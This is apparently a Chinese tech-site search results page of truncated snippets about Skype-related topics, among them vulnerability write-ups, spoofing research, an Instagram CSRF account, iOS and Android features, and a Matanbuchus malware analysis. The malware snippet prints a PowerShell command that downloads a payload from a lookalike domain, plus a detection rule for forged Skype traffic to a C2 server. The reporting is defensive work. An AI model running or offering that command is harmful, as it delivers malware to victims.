首页
学习
活动
专区
圈层
工具
发布

微软Outlook中#MonikerLink漏洞的风险和大局观

这是每个Outlook用户都知道的一个非常明显的行为。 有人可能想知道除http/https之外的其他协议表现如何?为此,研究人员特地做了测试。...结果显示,如果链接字符串以一个典型的应用程序URL协议开头,并且Outlook认为该URL协议可能存在一些安全问题,例如,“Skype”URL协议,如下所示(在HTML电子邮件中): *API文档显示,API“MkParseDisplayName()”的第二个参数“szUserName”是要解析的“显示名”。我们来验证一下。...对于这一问题,研究人员已经成功地使用了.rtf 概念验证代码(PoC)并复制了攻击(见下图),结果显示,它在“WINWORD.EXE”进程中崩溃。...因此,这个安全问题很可能不仅存在于Microsoft Outlook中,也可能存在于以不安全的方式使用API的其他软件中并影响它们。研究人员只是碰巧在Outlook中发现了这个问题。

86610
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    针对Skype的欺骗&攻击研究

    众所周知,Skype中存储在这大量的欺骗攻击漏洞,但微软却不认为这些漏洞需要“立即提供安全修复服务”。 漏洞介绍 在我们的一次漏洞挖掘过程中,我们对web.skype.com域名进行了测试。...文件名欺骗 在该漏洞的帮助下,我们将能够使用伪造的文件名称以及后缀来给任意用户发送文件。我们发现了多种实现方法,但我们只演示其中一种。...共享名片欺骗 在与他人分享联系人名片时,我们可以拦截请求并修改名片显示的名称和用户名,并将修改后的内容呈现给目标用户: POST /v1/users/ME/conversations/19%REDACTED...让任意用户的Skype崩溃 在修改请求主体中“content”值时,我不小心放置了太多的标签,结果导致了对话两端(攻击者和目标用户)的Skype发生了崩溃,并导致聊天内容永久性的无法访问。...使用Skype的域名进行网络钓鱼攻击 当你在聊天框发送一个文件时,它首先被上传到Skype的服务器上,然后聊天中的每个用户都可以访问该文件。

    1.3K10

    mod_skypopen

    Skype是世界上广泛使用的VoIP软件,不过,在被微软收购后表现不怎么样,最近又传出Skype将停止提供第三方API接口,也就是说FreeSWITCH将无法与新版的Skype互通。...Skype不是提供API吗?也就是说它允许外部的程序通过一定的API控制Skype(相当于通信信令)。...在Linux中,通过使用内核中的虚拟声卡,可以指定不同的Skype实例使用不同的虚拟声卡,而在FreeSWITCH中通过访问这些虚拟声卡读写音频数据(相当于媒体流),进而完成信令和媒体的交互。...后来,Skype允许在一台主机上用同一账号多次登录,所以,我们就用同一个Skype账号登录20个Skype实例,实现了类似模块中继线的功能——打出去对外显示一个号。...当然,不管是新用户还是老用户,随时都可以输入m或1显示本账号的主菜单。

    1.2K21

    QQ、MSN、淘包旺旺、Skype临时对话的html链接代码

    如何在网页上显示腾讯QQ在线洽谈?...第三步,将代码嵌渗入渗出Web HTML页面中。 使用Skype链接你可以把Skype链接放入到HTML代码中,这样别人在打开页面后就能方便的联系你。缺省情况下为呼叫动作,你也可以设置为其他动作。...呼叫 当有人点击一个呼叫链接时,Skype会向该链接中的Skype用户名/电话号码发起呼叫。 skype:user1?...call (SkypeOut呼叫) 添加为好友 该链接会将其中的Skype用户名添加到点击该链接的用户的好友列表中。你也可以用这些链接来添加SkypeOut联系vagaa搜索关键词人。...sendfile (同时向多个用户发送文件) 带状态显示的链接 http://mystatus.skype.com/balloon/Skype用户名 http://mystatus.skype.com

    3.1K30

    生活中必不可少的15个Web2.0网站

    TechCrunch的编辑列出了一张清单,上面是2007年生活中必不可少的15个web2.0网站。我建议大家每一个都打开看一下,它们很大程度上代表了未来10年中人类生活的发展方向。...Digg 网址:http://digg.com/ 由用户决定什么消息可以上首页,新闻业未来的模式。 6. Flickr 网址:http://flickr.com/ 网上储存照片。 7....Pandora 网址:http://www.pandora.com/ 提供在线点歌服务,歌曲库大得惊人,最有意思的功能是它可以向用户推荐相近风格的歌曲。 12....Skype 网址:http://www.skype.com/ 下一代通讯工具。将来人们见面不是交换电话号码,而是交换skype号码。 13....Techmeme 网址:http://www.techmeme.com/ 在线新闻,将相关的消息收集在一起,可以看到一个事件是如何发展的。 14.

    1.8K130

    FireEye:Hacking Team军火库中大量运用iOS假面攻击

    FireEye最近从HackingTeam军火库中发现11款iOS App使用了假面攻击,其中有一款恶意App还是针对未越狱用户的。...上图显示了经过重新打包的Facebook应用在运行时的行为,启动应用程序之后连续3次弹出请求访问照片,麦克风,以及联系人的警告。 ?...这些信息包括: Skype, Wechat等中的语音通话记录 Skype, Whats App, Facebook messenger等中的短消息拦截 Chrome网站历史记录 电话 SMS/短信内容...精确的GPS坐标记录 联系人信息 照片 需要特别注意的是,dylib有能力完成仅从目标用户下载数据的任务。...结语 从HackingTeam泄漏出的工具可以看出,针对iOS设备更加先进的攻击方法已经出现。我们鼓励iOS用户保持最快速度更新固件版本,以及验证应用程序的来源。

    1.1K50

    巨头竞相押宝的这些人工智能,教我们看懂下一个十年

    据消息称,Facebook正在使用人工智能技术帮助盲人通过ios手机应用看“看见”照片里的内容。...通过使用神经网络,Facebook开发的应用可以对每张照片生成一个描述,如:“有三名女性正拿着香槟笑”。...上月苹果将其在人工智能方面的成果公之于众,包括iPhone手机中的siri、识别陌生来电、解锁后列出最常使用的应用、在提醒事项中标记一个约会(但你并没有将之放入日程表中)以及自动显示附近标记的酒店等。...IBM以其Watson计算机(一种能够回答自然语言提出的问题的计算机系统)出名,其目标是使用计算机从照片、视频、文本及语言中提取意义。...Skype翻译系统利用机器学习技术,将能够识别用户的语言,并在你说话的同时将用户语言转换为翻译文本。 Salesforce ?

    1.1K60

    WWDC2016 Session笔记 - iOS 10  推送Notification新特性

    在iOS 8 中,我们可以给推送增加用户操作,这样使推送更加具有交互性,并且允许用户去处理用户推送更加的迅速。到了iOS 9 中,苹果又再次增加了快速回复功能,进一步的提高了通知的响应性。...如果经常使用iMessage的朋友们,就会经常收到一些信息,附带了一些照片或者视频,所以推送中能附带这些多媒体是非常重要的。...当我们获取到了attachment的使用权之后,我们就可以使用那个文件获取我们想要的信息了。 上述例子中,我们从attachment中获取到图片,并展示到UIImageView中。...这里并没有新的API,还是用原来的API。我们可以使用已经存在的UIKit的API去定制输入的input accessory view。它可以让我们开发者加入自定义的按钮。...如何定义content extension的用户UI界面 如何响应用户操作action 最后,请大家多多指教。

    1.2K20

    还原Facebook数据泄漏事件始末,用户信息到底是如何被第三方获取的?

    从英国《观察者报》报道中 Facebook 声明确认的文件显示,到 2015 年底,该公司发现信息收集的规模是空前的。...这里有一份官方指南,本指南演示了从 Facebook 获取信息,并使用 Graph API 将信息发布到 Facebook 平台上的相关知识。...虽然此请求限制了响应窗格中所显示的项目数量,但仍然可以使用基于光标的分页操作来访问其他相册。...系统的响应将返回 post_id 。 post_id 由你的用户 id ,后面加下划线和整数组成。 检查资源管理器中的更新。 从系统响应中单击 post_id ,将其移至查询框。...如果该帖子已更新,则会显示成功的回复。 在大多数情况下,执行更新的应用程序必须是能够创建需要更新的对象的程序。 删除 Facbook中 的内容 假如你有一个应用程序允许用户从其时间轴中删除一些帖子。

    5.3K50

    走近科学:我是如何入侵Instagram查看你的私人片片的

    它的一个独特的性质是它将照片规范为正方形形状!像 那种类似于柯达傻瓜相机(Kodak Instamatic)和宝丽莱(Polaroid)照片。与宽高16:9的现在通常使用的移动相机形成鲜明对 比。...经过整个站点的勘测后,我意识到,与移动应用程序不同的是,在网站上用户不能改变他的个人资料的隐私。 下面图片显示的是我指的差异: ? ? 它是如何工作的?...:\/\/insertco.in"}} 正如你可能已经注意到了,在过去的用户请求中,移动应用程序不使用任何像秘密安全令牌机制一样的东西防止像CSRF类的攻击。...又因为在我的测试中我意识到,Instagram的API没有控制用户在set_public 和 set_private 实现和行为中的用户代理请求。...不幸的是,在使用Web API的现有的移动应用程序中实现CSRF非常不容易的,因为应用程序有旧客户端没有发送正确的验证,这是不会立即锁定的重要原因。

    7.2K70

    如何批量识别出照片中的水印文字,并将文字作为照片名进行改名分类?基于QT和腾讯OCR的项目实战

    用户流程​选择照片文件夹:用户通过菜单或工具栏选择包含照片的文件夹。​加载照片:系统加载并展示所选文件夹中的所有照片缩略图。​...开始识别:用户点击“开始识别”按钮,程序调用腾讯OCR API进行文字识别。​显示结果:识别结果实时显示在界面上,用户可以查看和编辑。​...重命名照片:根据识别出的文字,自动将照片重命名为识别到的文字内容。​完成提示:系统完成所有操作后,显示处理结果和日志信息。三、详细代码1. 环境准备​QT版本:建议使用QT 5.12及以上版本。​...腾讯OCR SDK:使用腾讯云提供的C++ SDK或通过HTTP接口调用RESTful API。​...端点和认证:上述代码中的API端点https://ocr.tencentcloudapi.com仅为示例,实际使用时需要替换为腾讯云OCR的具体API地址,并按照腾讯云的文档配置认证信息(如API Key

    1.2K00

    如何用短信完成XSS?

    在我安装好了Android端App并完成注册之后,我又登录了Web端App并开始使用这款应用。使用了一段时间之后,我发现该应用会通过Web端和移动端的接口显示包含链接的消息预览通知。...这些链接支持图片和视频等资源,但我更感兴趣的是应用将会如何解析这些链接。 我感觉从Web端App着手会比较容易一些,所以我自己给自己发送了一些测试链接。 ?...下面给出的是响应数据的部分内容: ? 正如你所看到的,响应信息中包含UI界面预览信息图片所对应的Open Graph属性。...请注意,上面的“imageUrl”实际上是Verizon的服务器所返回的代理图片(并非来自外部服务器),而这种代理技术可以让服务商更好地控制显示在用户浏览器中的图片内容。 ?...更新 貌似Verizon最终还是选择了使用DOM API来解决这个问题。 ?

    1.7K50

    深度学习的应用总结(翻译)

    实时语音翻译 微软的Skype能够将语音实时翻译成不同的语言。 自动回复电子邮件 Google的Mail可以代替您自动回复电子邮件。...黑白照片变彩色 将黑白照片自动转换成彩色:http://richzhang.github.io/colorization/。...三维物体分类 手势识别 使用不同的手势,对没有屏幕的设备进行交互。 拍照自动微笑 SmileVector可以把一张照片的人,自动转换成微笑的表情的照片。...Prosetheses控制 通知脑电图描记器参与提取记录中语音混合物在神经转向听力假肢中的应用。 流体模拟 利用卷积网络创建快速且高度逼真的流体模拟。...摄取街景 Facebook正在利用深度学习技术,从卫星图像上创建更加准确的地图。 语音识别 通过声音进行识别。 红外彩色化 用户可以更加快速准确地理解已经被着色的红外图像。

    1.1K60

    安卓13又来了?快!扶起我来!

    开发者可降级权限从 Android 13 开始,应用可以撤消先前由系统或用户授予的运行时权限。开发者可以:撤消未使用的权限。遵循权限最佳做法,从而提高用户信任度。...剪贴板中隐藏敏感内容从 Android 13 开始,将内容添加到剪贴板时,系统会显示标准视觉确认界面。新确认界面会执行以下操作:确认内容已成功复制。提供所复制内容的预览。...图片照片选择器提供了一个可浏览、可搜索的界面,其中按日期(从最近到最早)顺序向用户呈现其媒体库中的文件。可以指定用户只能看到照片或只能看到视频,并且默认情况下,允许的媒体选择量上限设置为 1。...定义分享限制应用可以声明 android.provider.extra.PICK_IMAGES_MAX 的值,该值表示在向用户显示时照片选择器中显示的媒体文件数量上限。...咱们可以在 setType() 方法中设置 MIME 类型,以便按“仅显示照片”或“仅显示视频”进行过滤。

    1.5K40

    基于Microsoft Teams的Matanbuchus 3.0恶意加载器攻击分析与防御机制研究

    在远程会话中,攻击者引导用户手动执行以下PowerShell命令:Invoke-WebRequest -Uri "http://notepad-plus-plu[.]org/update.zip" -OutFile...C2域名为nicewk[.]com,通信内容使用Salsa20流加密(取代旧版RC4),并伪造User-Agent为Skype桌面客户端:User-Agent: Mozilla/5.0 (Windows...请求中Host为nicewk[.]com;User-Agent包含"Skype/"但源IP未在Skype官方IP段内;Salsa20加密流量表现为高熵、无明文结构的数据流。...; http_header;content:"User-Agent|3a| Skype/"; http_header;flow:established,to_server;sid:1000001;)四、...未来防御需从“基于签名”转向“基于行为上下文”的分析范式。此外,协作平台的安全边界亟待重新定义。

    21110

    最全Html标签Meta介绍,全面总结,学HTML这一篇够了

    它可用于浏览器(如何显示内容或重新加载页面),对搜索引擎和更新频度的描述和关键词,或其他 web 服务。    标签位于文档的头部,不包含任何内容。...--每5秒钟刷新一下页面--> 移动设备    viewport:能优化移动浏览器的显示。如果不是响应式网站,不要使用initial-scale或者禁用缩放。...很多人使用initial-scale=1到非响应式网站上,这会让网站以100%宽度渲染,用户需要手动移动页面或者缩放。...-- 是否开启cleartype显示效果 --> http-equiv="cleartype" content="on"> skype_toolbar" content...content="text/html; charset=utf-8">   禁止缓存:禁止浏览器从本地机的缓存中调阅页面内容,网页不保存在缓存中,每次访问都刷新页面。

    1.9K11

    WWDC2016简报

    3、Siri开放SDK iOS10中,用户可以直接在Siri中控制第三方应用,比如搜索、查看微信消息,通过Siri呼叫滴滴打车等。...4、相册应用 iOS10中的相册应用现在加入智能脸部识别和场景识别功能,支持高级搜索功能,也将自动整合元素相近的照片,提供一个记忆功能面板,可以提供基于地图或不同身份的整合显示。...9、电话功能 iOS10电话功能专门为中国用户进行了优化,增加骚扰电话过滤功能,由腾讯安全提供技术支持。联系人功能加强,提供VoIP API,社交软件的联系方式可以直接添加到自带联系人中。 ?...Dock栏以及顶部出现,它可以在Finder中搜索文件,可以处理邮件,使用iCloud Drive,播放音乐,从网上查找内容,控制音乐视频播放等等,还可以进行图片搜索,可以使用Siri进行语音回复,甚至可以使用...功能和国内很多电视盒子的适配应用一样,用户可将iPhone作为Apple TV遥控器使用,还可以使用iPhone的键盘更加便捷的输入文本。

    1.9K110

    Pexels免费图片API文档

    获取更到信息可以在API预览页 或 继续阅读来了解我们的API 如何工作的以及如何集成它. 指南 无论什么时候, 当你发送一个请求的时候, 请确保在突出的位置显示Pexels的链接....如果可能的话, 可以将我们的摄影师名称显示出来 (例如 "照片由John Doe 上传到 Pexels" 链接到Pexels的对应页面). 不要复制Pexels的核心功能. 不要滥用 API....per_page=15&page=1 我们每个小时会添加至少一个照片到我们的策展列表, 所以你可以得到一组不断更新的照片. 有关请求参数和响应格式可以查看上面的搜索方法....获取一张照片 https://api.pexels.com/v1/photos/:id 如果你有一张照片的id, 你可以使用它来获取信息 随机照片 如果你想获取随即照片, 你可以使用"策展照片...如果你想获取随机的指定主题的照片, 可以使用相同的方法. 搜索视频 https://api.pexels.com/videos/search?

    5.6K20

    GIF动图只能用做表情包?黑客拿来入侵微软视频会议软件

    每次打开应用程序时,都会在此过程中创建访问令牌,JSON Web令牌(JWT),从而使用户可以查看个人或其他人在对话中共享的图像。...Teams使用多个API端点与服务进行通信,并将用户操作发送到相关API端点,此时则需要进行身份验证来匹配操作和用户身份。常用方式是发送访问令牌,而Teams在图像方面出现问题。...这就是问题所在,研究人员能够获得一个authtoken cookie,该cookie授予对资源服务器(api.spaces.skype.com)的访问权限,并使用它来创建上述的“ skype令牌”,因此他们具有很大的不受限制的权限...,可以发送消息、阅读消息、创建群组、添加新用户或从群组中删除用户,甚至通过Teams API更改群组中的权限。...参考链接: GIF图像如何使攻击者入侵Microsoft Teams帐户 小心GIF:Microsoft Teams中的帐户接管漏洞

    2.1K10
    领券